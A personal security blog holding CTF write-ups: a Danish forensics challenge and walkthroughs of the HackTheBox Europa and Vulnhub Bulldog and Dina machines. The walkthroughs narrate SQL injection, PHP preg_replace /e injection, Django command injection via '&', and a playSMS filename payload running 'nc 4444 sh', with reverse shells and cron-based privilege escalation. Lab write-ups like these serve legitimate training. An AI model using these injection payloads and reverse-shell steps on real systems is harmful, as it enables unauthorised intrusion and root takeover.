Writings of Anders Ernstpriis Kusk.

mail: a@rce.sh

published cve's
press stuff


me @ twitter
me @ github
me @ linkedin

NC3CTF2017 – Opgave 1 – Pixeleret

Lavet af undertegnede.

Den anerkendte kubistiske kunster J. Tüddel er blevet bestjålet. Et udkast til hans næste mesterværk “Dådyr i knibe” er blevet stjålet. Heldigvis har Tüddel gemt udkastet på en kringlet måde, således at gerningsmanden ikke bare ville kunne sælge det videre. 5 dage efter tyveriet bliver den storkriminelle K. Pløs anholdt mistænkt for tyveriet. I dennes lomme bliver en USB-stick indeholdende en fil fundet. Indeholder denne fil virkelig Tüddels firkantede mesterværk?

Anvendt software: binwalk, cramfs, python

Når filen er blevet downloadet kan man via en hexeditor(HxD i windows, wxhexeditor/xxd i linux) kontrollere filens start og slut. Filen er angivet som en JPG billedfil. En sådan vil normaltvis starte med hexværdierne FF D8 og slutte med FF D9.Her ser vi at filen starter med FF D8

Ved slutningen slutter den ikke med FF D9. Mistænkeligt!

Binwalk kan med -e carve/extract data fra filen. Vi kan se at de forskellige filer indeholder forskellige andre filer, f.eks. diverse filsystemer.

Til sidst har vi to cramfs filsystemer. Disse kan binwalk ikke udpakke filer fra, så vi er nødt til at mounte dem til en mappe. Til det skal man have cramfs installeret på sin computer. Efter at have mountet .cramfs filen finder vi to tekstfiler i filsystemet. Den ene fil består af en kort tekst.

Den anden består af en linje med noget hex-lign. tekst. Hvis vi udskifter hvert “x” med en new-line og tæller linjerne ser vi, at vi har 89700 hexværdier. Da 300×300 er 90000 kan vi nogenlunde gætte os til, at hver hexværdi udgør ca. en pixel i et billede.

Ved på samme måde at indsætte en new-line og derefter at sorte og fjerne alle ikke unikke hexværdier kan vi se, at teksten indeholder 8 forskellige hexværdier. Lad os antage at de hver især udgør en farve i billedet.

Vi kan herefter skrive et python-script der går igennem filen og danner et billede. Se #comments i koden.

Og til sidst får vi så billedet sådan ca.

HackTheBox.eu – Europa

Created by ch4p

Software used: nmap, burp, netcat

As always, nmap first.

So basically ssh,http and https.

Visiting http and https gives us a boring “Just installed” page. Dirbuster gives us nothing. So lets take a look at the SSL-certs.

One e-mail found. Might become handy later.

Two new hostnames found, one which seems very interesting. So for easy access I added them to my /etc/hosts file.

A login page. Tried a couple of default user/password combination. Nothing. No software name found, so login page looks homemade. Maybe SQL-injection will do the trick?

I configured the browser to use my burp proxy intercept. Playing around with the variables and some pretty standard SQL-injection. I found that only the email variable was open for SQL-injection.

And we are in.

Looking around on the site gave me a OpenVPN Config Generator under the “Tools”-page. The generator has one input(not visible here) which ask for a IP. After submitting the IP is inserted into the displayed config-text. Playing around with it showed that the generator was using the preg_replace regex function in php. This can be bad(and good for me), since it can open up for command injection. This article describes it:

Most modifiers are quite harmless and let you do things like case-insensitive and multi-line searches, however one modifier, “e” will cause PHP to execute the result of the preg_replace() operation as PHP code. Let me just restate:

Setting the e regex modifier will cause PHP to execute the replacement value as code.

Why does PHP have this option? I have no idea, and it’s actually been deprecated in later revisions (PHP >= 5.5.0) because of its recklessly insecure nature. Many people are still using PHP 5.2 or moving onto PHP 5.3, and even when deprecated the option will still work (it’ll generate a warning at a log level turned off by default), so the issue will be around for a while yet.

So we have to insert a /e in order to exploit this. Using burp to catch the POST data and modifying the data and added a %2Fe does this(%2F is a URL-encoded forward slash). I decided to grab a php-reverse-shell and place it on the webserver in the folder /vendor which I knew existed.

The intercepted command ready for forwarding.

I also needed to provide the php-reverse-shell file from my workstation.

And I needed to ready netcat for the reverse shell before I visited https://admin-portal.europacorp.htb/vendor/re2.php. When I visited the URL the reverse-shell connected back and I got my shell as the “www-data” user.

The www-data user was enough to get the user flag. But not enough for the root flag.

Looking around for setuid files and other typical exploitable files I found that cron runs a script as root every minute.

The script is a PHP-script that clears the accesslog. Furthermore it executes /var/www/cmd/logcleared.sh which doesn’t exists.

Since cron runs the PHP-script as root the logcleared.sh will also run as root. Knowing that it was easy to see how that could be exploited. I created the logcleared.sh set it to copy the flag to /tmp and change its permissions to make it readable.

And made logcleared.sh executable.

And then there was a root flag!

Vulnhub.com – Bulldog

Created by Nick Frichette

Software used: nmap, dirbuster, netcat

Nmap showed SSH running on the typical telnet port and two pythonbased HTTP-servers on port 80 and 8080.

Visiting the webserver on port 80 gave nothing of value. Running dirbuster against it gave a few interesting directories.

/dev/ directory showed a page and a link to a weird none-functioning site.

The source for the website showed a couple of possible usernames(before each @) and a md5sum for each user. Searching Google for each hash showed, that the hashed word for nick was “bulldog”.

/admin/ was a django loginpage. Using the username nick with the password “bulldog” worked.

The actual site didn’t have any functionality.

Looking further around and visiting the web-shell link on “/dev/” again showed, that the webshellpage had changed. It now featured a kind of webshell with a few commands and a textarea with the output. Trying to run two commands with “;” didn’t work. Browsering around on the filesystem showed the source for the django application in the file “views.py”

from django.shortcuts import render
import subprocess

commands = [ifconfig,ls,echo,pwd,cat,rm]

def homepage(request):
    return render(request, index.html)

def notice(request):
    return render(request, notice.html)

def dev(request):
    return render(request, dev.html)

def shell(request):
    if request.method == "POST":
    command = request.POST.get("command", None)
    to_return = "Command : " + command + "\n\n"

if validate(command):
    execute = subprocess.check_output(command, shell=True)
    to_return += execute
elif ";" in command:

    context = {data: to_return}
    return render(request, shell.html, context)
    return render(request, shell.html)

def validate(command):
    if any(com in command for com in commands) and ";" not in command:
        return True
    return False

From the source I could read, that the program wasn’t secured against using “&”. As long as a allowed command was in the commandline and not a “;”, anything else could be included after a “&”.

So the easy thing would be to wget a reverse-shell and run it. First I needed a python HTTP server to serve a perl reverse-shell. I then ran “ls & wget -O /home/django” in the web-shell. And then “ls & perl /home/django/perl-reverse-shell.pl” to connect to a already running netcat session on my workstation.

And we got a shell. This time running as the user “django”.

Looking around for a way to privesc I found the cronjob in /etc/cron.d/runAV which ran a python script every minute as root. The script didn’t do anything and it’s permission allowed it to be edited by everyone.

So I added the python os package for the os.system function to run a command. Then I added a line which would execute a new reverse-shell that I already had wgetted.

And after a minute my new netcat session was connected to by the new reverse-shell. And this time I had root and was able to read the flag.

Vulnhub.com – Dina

Created by Touhid Shaikh

Software used: nmap, dirbuster, netcat

A beginner CTF VM from vulnhub. Easy and quick to do.

First a look at the box with nmap. Only a HTTP-server open.

Visiting the website didn’t give anything useful. Running dirbuster against the server gave a few interesting files and directories.

The /nothing/pass was a text file with what looked like passwords.

After downloading the backup.zip file and opening it, I found that it was password protected. The password “freedom” from the pass file opened the zip file and extracted “backup-cred.mp3”. This file was also a text file and contained a username and a URL.

Visiting the URL showed, that it was hosting something called playSMS. Using the username “touhid” and the password “diana” from the file pass I was able to login.

Searching on exploit-db for playSMS showed that there was an exploit in the file upload function.

Unrestricted File Upload:

Any registered user can upload any file because of not proper Validation of file in sendfromfile.php

Code Execution using $filename

Now We know sendfromfile.php accept any file extension and just read content not stored in server. But there is bug when user upload example: mybackdoor.php server accept happily but not store in any folder so our shell is useless. But if User change the file name to “mybackdoor.php” to “.php” den server check for file and set some perameter $filename=”.php” , U can see code below and display $filename on page.

When uploading a file playSMS will display the filename of the uploaded file on the webpage. So by uploading a file where the filename contains PHP-code, the PHP-code will be executed serverside. The problems is, that a filename can’t contain a lot of useful characters, fx. forward slash. So we will not be able to do much directory traversal other than to a parent directory. Sooo what to do?

Well at least I can take a look in the parent directory. I uploaded a file with the filename: “a.png” which listed all files recursively from the parent directory including their permissions. That way I could see which folders I could write to. It looks like “tmp” and “uploads” has the right permission for everybody to upload.

Next up I created a small script that would download a reverse shell from my workstation and execute it. I then configured netcat to send the script to anybody who would connect.

A quick python HTTP-server to serve the reverse-shell.

I then created a file called: “a<?php system(“nc 4444 sh”); ?>.png” which when uploaded, would connect to my netcat session on port 4444, receive the script and execute it with a shell.

Since the script would download and execute the perl script which would connect to my workstation at port 4445, I needed to confgure a netcat session on that port. After uploading the file, playSMS ran netcat which downloaded my script and executed it. The script downloaded my reverse-shell and executed it, and the reverse-shell connected to my other netcat session and gave me a reverse shell.

I was now inside as the www-data user. A quick test showed, that the www-data user had permission to run perl with sudo. Easy stuff.

So I wgetted a new reverse-shell, this time configured to connect to another netcat session on port 4446. I ran the reverse-shell with sudo and got a new reverse-shell, this time with root rights. I now had the root flag! Easy.